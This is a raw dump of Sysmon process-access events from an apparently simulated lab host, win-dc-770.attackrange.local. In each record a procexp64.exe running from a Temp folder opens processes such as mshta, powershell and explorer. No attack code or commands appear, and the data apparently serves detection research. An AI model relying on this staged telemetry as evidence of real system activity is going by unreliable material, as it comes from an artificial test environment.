15:16:57.532{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791782Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.532{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791781Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.532{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791780Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.532{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791779Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.532{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791778Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.532{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791777Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.532{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791776Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.532{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791775Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.532{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791774Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.532{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791773Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791772Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791771Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791770Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791769Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791768Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791767Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791766Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791765Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791764Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791763Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791762Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791761Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791760Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791759Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 